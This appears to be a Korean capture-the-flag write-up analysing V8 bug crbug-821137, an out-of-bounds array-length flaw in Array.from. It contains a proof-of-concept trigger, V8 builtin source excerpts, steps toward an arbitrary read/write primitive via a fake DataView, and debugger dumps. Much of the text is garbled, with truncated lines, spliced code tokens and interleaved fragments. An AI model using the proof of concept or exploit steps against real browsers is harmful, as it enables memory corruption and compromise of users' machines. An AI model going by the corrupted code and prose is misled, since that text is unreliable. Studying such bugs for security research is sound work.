# ref • https://chromium.googlesource.com/v8/v8/+/b5da57a06de8791693c248b7aafc7 Roll a d8 and win your game. Last year, hackers successfully exploited Chakrazy. This time, we came back with d8 powers.	
You can download relevant material here. This might only be helpful to Google employees or is it? https://crbug.com/821137 # Bug Analysis	red by vo davacenpt engine.
crbug-821137에 해당하는 Hint가 나가서, 이에 대응하는 regress file을 찾아보았더니 있었다. (Aft # regress-821137.js let oobArray = []; Array.from.call(function() { return oobArray }, {[Symbol.iterator] : _ => (,
<pre>let result = this.counter++; if (this.counter == this.max) { oobArray.length = 0; return {done: true}; } else { return {value: result, done: false}; } </pre>	
}) }); oobArray[oobArray.length - 1] = 0x41414141; 간단하게 poc code를 바탕으로 설명하면, Symbol.iterator를 임의로 정의를 해주고, 내부적으로 net 원래 정의상, iteratable한 object에 대하여, done이라는 값이 next()라는 함수가 리턴해줘야하는 것	·
여기서, 문제가 되는 것이, iterate한 만큼의 수를 runtime에서 실제 length로 세팅하고 사용을 하는데을 간과한 것이다. 그래서, 마지막 루프에서 array length는 0으로 세팅하지만, 내부 코드에 의해서, 실제 길이는 loop를 이 원리로 oobArray에 대하여 OOB R/W가 발생하게 된다. # poc full description [TODO]	
# builtins-array-gen.cc // First determine if `map_function` can be called TNode <object> map_function = args.GetOptionalArgumentValue(1); // If map_function is not undefined, then ensure it's callable else throw {</object>	1.
<pre>Label no_error(this), error(this); GotoIf(IsUndefined(map_function), &no_error); GotoIf(TaggedIsSmi(map_function), &error); Branch(IsCallable(map_function), &no_error, &error); BIND(&error); ThrowTypeError(context, MessageTemplate::kCalledNonCallable, map_functiBIND(&no_error); }</pre>	on);
<pre>// See if [Symbol.iterator] is defined IteratorBuiltinsAssembler iterator_assembler(state()); Node* iterator_method = iterator_assembler.GetIteratorMethod(context, array_like); Branch(IsNullOrUndefined(iterator_method), ¬_iterable, &iterable); // can be iterated</pre> PIND(0 iterated)	
<pre>BIND(&iterable); { // Verify that the method can be called, you can call to jump to next // Check that the method is callable. { Label get_method_not_callable(this, Label::kDeferred), next(this); GotoIf(TaggedIsSmi(iterator_method), &get_method_not_callable); GotoIfNot(IsCallable(iterator_method), &get_method_not_callable);</pre>	
<pre>Goto(&next); BIND(&get_method_not_callable); ThrowTypeError(context, MessageTemplate::kCalledNonCallable,</pre>	
<pre>array = ConstructArrayLike(context, args.GetReceiver()); // Actually get the iterator and throw if the iterator method does not // one. IteratorRecord iterator_record = iterator_assembler.GetIterator(context, items, iterator_method); TNode<context> native_context = LoadNativeContext(context); TNode<object> fast_iterator_result_map = LoadContextElement(native_context, Context::ITERATOR_RESULT_MAP_INDGoto(&loop);</object></context></pre>	
// Loop, enter the loop BIND(&loop); { BIND(&loop_done); { length = index; // Jump to finished when the loop is complete	
<pre>Goto(&finished); } // Unable to iterate BIND(¬_iterable); {</pre>	
BIND(&finished); // Finally set the length on the output and return it. GenerateSetLength(context, array.value(), length.value()); args.PopAndReturn(array.value());	
poc code에서 나타나는 문제의 root cause는 iterator 이후 실제로 length를 지정하는 다음과 같은 class ArrayPopulatorAssembler : public CodeStubAssembler { void GenerateSetLength(TNode <context> context, TNode<object> array,</object></context>	· 곳에서 발생한다.
참고로, 코드를 보다보면, Label과 BIND 문을 자주 볼 수 있는데, 이는 어셈블리로 바뀌었을 때, jmp즉, 조건에 따른 분기 지점을 binding 하는 것이다.	류의 instruction과 label로 변경된다.
namespace internal { // // Labels represent pc locations; they are typically jump or call targets. // After declaration, a label can be freely used to denote known or (yet) // unknown pc location. Assembler::bind() is used to bind a label to the // current pc. A label can be bound only once. class Label { public:	
<pre>enum Distance { kNear, // near jump: 8 bit displacement (signed) kFar // far jump: 32 bit displacement (signed) }; Label() = default;</pre>	!는지는 "builtins-iterator-gen.(h/cc)" 에서 확인할
Array like Object에 대하여 item[Symbol.iterator]라는 것이 있는데, 이에 대하여 따로 정의된게 있 있다. class IteratorBuiltinsAssembler : public CodeStubAssembler { public: explicit IteratorBuiltinsAssembler(compiler::CodeAssemblerState* state) : CodeStubAssembler(state) {} // Returns object[Symbol.iterator].	you.(ii/CC) 에서 확인할
Node* GetIteratorMethod(Node* context, Node* object); GetIteratorMethod()를 통해서, 따로 정의해둔게 있다면, 해당하는 함수를 호출할 수 있다. 실제 코드는 다음과 같다.	
Node* IteratorBuiltinsAssembler::GetIteratorMethod(Node* context, Node* object) { return GetProperty(context, object, factory()->iterator_symbol()); } 정리해서 말하자면, iterator symbol이 정의된 것이 있으면, 가져와서 해당 iterator를 통해서 루프를	돌게되고, 이 루프를 돈 만큼 length를 저런게다다
고리고 마지막에 GenerateSetLength가 호출되는데, 여기서 핵심 문제점이 있는 것이다. void GenerateSetLength(TNode <context> context, TNode<object> array,</object></context>	f the
<pre>// fast path. // Only set the length in this stub if // 1) the array has fast elements, // 2) the length is writable, // 3) the new length is equal to the old length. // 1) Check that the array has fast elements. // TODO(delphick): Consider changing this since it does an an unnecessar // check for SMIs.</pre>	ıry
<pre>// TODO(delphick): Also we could hoist this to after the array construct // and copy the args into array in the same way as the Array constructor BranchIfFastJSArray(array, context, &fast, &runtime); BIND(&fast); { TNode<jsarray> fast_array = CAST(array); TNode<smi> length_smi = CAST(length); TNode<smi> old_length = LoadFastJSArrayLength(fast_array); CSA_ASSERT(this, TaggedIsPositiveSmi(old_length));</smi></smi></jsarray></pre>	
<pre>// 2) Ensure that the length is writable. // TODO(delphick): This check may be redundant due to the // BranchIfFastJSArray above. EnsureArrayLengthWritable(LoadMap(fast_array), &runtime); // 3) If the created array's length does not match the required lengt // then use the runtime to set the property as that will insert ho // into excess elements or shrink the backing store as appropriate</pre>	oles
GotoIf(SmiLessThan(length_smi, old_length), &runtime); StoreObjectFieldNoWriteBarrier(fast_array, JSArray::kLengthOffset, length_smi); Goto(&done); BIND(&runtime); { CallRuntime(Runtime::kSetProperty, context, static_cast <node*>(array)</node*>	,
<pre>CodeStubAssembler::LengthStringConstant(), length,</pre>	
FastJSArray일 경우, BIND(&fast)안의 루틴을 타게된다. length_smi의 경우, iteration의 횟수를 의미하고, old_length의 경우, Array의 length property를 색으로 강조된 부분에서 "length_smi < old_length"인지 체크를 하게되는데, 이는 "순회를 돈 itera 여기서 임의로 iteration의 횟수가 많아졌으며, 내부적으로 마지막 iteration에서 array length를 0으만약에 조건문이 참이라면, runtime 루프로 분기가 변경되는데, CallRuntime에서 length에 따라서 그러므로, 이 조건문은 넘어가고 StoreObjectFieldNoWriteBarrier 함수를 호출하게 된다. 여기서 array의 length가 length_smi로 변경되게되고, 실제 array가 가져야하는 길이보다 훨씬 큰 집	tion 횟수 < Array의 length"를 비교하는 것이 된다. 로 만들어버렸다. 메모리 크기의 변경이 일어난다.
Exploit 자체는 어렵지 않은데, poc의 root-cause 분석이 어려운 것 같다. Symbol.iterator 등이 native 레벨에서 어떻게 핸들링되는지 알아야하고, BIND라는 매크로가 정확한 # Exploit step OOB R/W를 다 가지고 있는데, Exploit을 위해서는 Arbitrary R/W로 바꿔야 한다.	
이전 zer0con 때의 박세준님의 발표 슬라이드를 참고하면 다음과 같다. • https://github.com/theori-io/zer0con2018 bpak/blob/master/code/exploit.js Arbitrary Read/Write Primitive (Cas	se 2)
 Construct a fake DataView object with controlled length buffer Note that the instance type is defined in the map object (Thus, we need a fake map object as well) Requires a fake ArrayBuffer object Backing store for the DataView we create 	gth and
 Only needs to have a valid allocation base (i.e. buffer address) DataView.prototype.getUint32.call(dv, 0, true); DataView.prototype.setUint32.call(dv, offset, value, 	
DataView를 조작하는데, backing store의 역할을 하는 ArrayBuffer 쪽을 바꾸는 것이다. 간단하게 분석을 먼저 해보자. ArrayBuffer, DataView, Function 이 세 개를 마음대로 조작하는데에 필요한 요소들이 무엇인지 살 @ ArrayBuffer	펴봐야 한다.
<pre>marshimaro-peda\$ x/gx args.values_ 0x7ffdfa94d360: 0x00000c19f7684e19 marshimaro-peda\$ job 0x00000c19f7684e19 0xc19f7684e19: [JSArrayBuffer] - map: 0x092dfc102399 <map(holey_elements)> [FastProperties] - prototype: 0x3103a980ea31 <object map="0x92dfc1023e9"> - elements: 0x0f4bedd00c21 <fixedarray[0]> [HOLEY_ELEMENTS] - embedder fields: 2</fixedarray[0]></object></map(holey_elements)></pre>	
<pre>- backing_store: 0x5606313be050 - byte_length: 4096 - neuterable - properties: 0x0f4bedd00c21 <fixedarray[0]> {} - embedder fields = { 0, aligned pointer: (nil)</fixedarray[0]></pre>	
<pre>0, aligned pointer: (nil) 0, aligned pointer: (nil) }</pre>	
0, aligned pointer: (nil)	
<pre>0, aligned pointer: (nil) } @ DataView marshimaro-peda\$ job 0x00000c19f7684e59 0xc19f7684e59: [JSDataView] - map: 0x092dfc1018f9 <map(holey_elements)> [FastProperties]</map(holey_elements)></pre>	
<pre>@ DataView marshimaro-peda\$ job 0x00000c19f7684e59 0xc19f7684e59: [JSDataView] - map: 0x092dfc1018f9 <map(holey_elements)> [FastProperties] - prototype: 0x3103a980b3f1 <object map="0x92dfc101949"> - elements: 0x0f4bedd00c21 <fixedarray[0]> [HOLEY_ELEMENTS] - embedder fields: 2 - buffer =0x0c19f7684e19 <arraybuffer map="0x92dfc102399"> - byte_offset: 0 - byte_length: 4096 - properties: 0x0f4bedd00c21 <fixedarray[0]> {} - embedder fields = { 0, aligned pointer: (nil) 0, aligned pointer: (nil) } marshimaro-peda\$ job 0x092dfc1018f9 0x92dfc1018f9: [Map] - type: JS_DATA_VIEW_TYPE - instance size: 64 - inobject properties: 0</fixedarray[0]></arraybuffer></fixedarray[0]></object></map(holey_elements)></pre>	
<pre>0, aligned pointer: (nil) } @ DataView marshimaro-peda\$ job 0x00000c19f7684e59 0xc19f7684e59: [JSDataView] - map: 0x092dfc1018f9 Map(HOLEY_ELEMENTS)> [FastProperties] - prototype: 0x3103a980b3f1 <0bject map = 0x92dfc101949> - elements: 0x0f4bedd00c21 <fixedarray[0]> [HOLEY_ELEMENTS] - embedder fields: 2 - buffer =0x0c19f7684e19 ArrayBuffer map = 0x92dfc102399> - byte_length: 4096 - properties: 0x0f4bedd00c21 <fixedarray[0]> {} - embedder fields = {</fixedarray[0]></fixedarray[0]></pre>	
@ DataView marshimaro-peda\$ job 0x00000c19f7684e59 0xc19f7684e59: [JSDataView] - map: 0x092dfc1018f9 Map(HOLEY_ELEMENTS">Map(HOLEY_ELEMENTS">Map(HOLEY_ELEMENTS") Mar(HOLEY_ELEMENTS") Mar(H	
0, aligned pointer: (nil) **** ObataView** *** Marshimaro-peda\$ job 0x00000c19f7684e59 0xc19f7684e59: [JSDataView] *** map: 0x092dfc1018f9 **Aap(HOLEY_ELEMENTS)> [FastProperties] - prototype: 0x310303080b3f1 **Object map = 0x92dfc101949> - elements: 0x0f4bedd00c21 **FixedArray[0]> [HOLEY_ELEMENTS] - elements: 0x0f4bedd00c21 **FixedArray[0]> [HOLEY_ELEMENTS] - embedder fields: 2 - byte_offset: 0 - byte_length: 4096 - properties: 0x0f4bedd00c21 **FixedArray[0]> {} - embedder fields: { 0, aligned pointer: (nil) 0, aligned pointer: (nil) } **marshimaro-peda\$ job 0x092dfc1018f9 **ox92dfc1018f9: [Map] - type: JS_DATA_VIEW_TYPE - instance size: 64 - inobject properties: 0 - elements kind: HOLEY_ELEMENTS - unused property fields: 0 - enum length: invalid - stable_map - back pointer: 0x0f4bedd004d1 **undefined> - prototype_validity cell: 0x3006c8e80609 **Cell value= 1> - instance descriptors (own) #0: 0x0f4bedd00259 **ObscriptorArray[0]> - layout descriptor: (nil) - prototype: 0x31030380b311 **Object map = 0x92dfc101949> - constructor: 0x31030380b311 **Object map = 0x92dfc101949> - constructor: 0x31030380b311 **Object map = 0x92dfc101949> - constructor: 0x31030380b311 **Object map = 0x92dfc101949> - construction counter: 0 **DataViewOHA buffer를 보게되면, ArrayBuffer의 Object 위치를 가리킨다. **Fake DataView를 사용할 때는, 위의 색칠한 부분을 유의해서 값을 설정해주면 된다. **DataView.prototype.get/setUint32()를 사용하게되는데, 여기서 검증하는 것은 ArrayBuffer의 이 있다. **@ Function (Array.prototype.map) **marshimaro-peda\$ x/gx args.values_ 0x7ffdfa9d360: 0x0000310303811141 **marshimaro-peda\$ \$0b 0x0000310303811141	
### ObataView ### Marshimaro-peda\$ job 0x000000c19f7684e59 ### Marshimaro-peda\$ job 0x000000c19f7684e59 ### Marshimaro-peda\$ job 0x000000c19f7684e59 ### Marshimaro-peda\$ job 0x000000c19f7684e59 ### Oxac19f7684e59: [JSDataView] ### map: 0x092dfc1018f9	
@ DataView morshimoro-peda\$ job @x000000c19f7684e59 %xc19f7684e59: [JSDataView] - map: 0x092dfc1018f9	

keyword : chrome v8, Iterator Symbol